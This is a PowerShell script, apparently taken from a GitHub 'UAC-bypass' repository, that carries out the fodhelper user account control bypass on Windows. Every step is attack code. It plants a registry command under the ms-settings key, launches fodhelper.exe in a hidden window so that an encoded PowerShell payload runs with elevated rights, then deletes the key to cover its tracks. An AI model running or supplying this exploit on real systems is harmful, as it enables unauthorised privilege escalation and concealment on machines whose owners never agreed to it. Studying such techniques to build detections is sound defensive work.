https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1

# Create reg structure
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force

# Place command in
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "cmd.exe /c powershell -encoded <encodecommand>" -Force

# Launch
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden

# Clean
Start-Sleep 3
Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force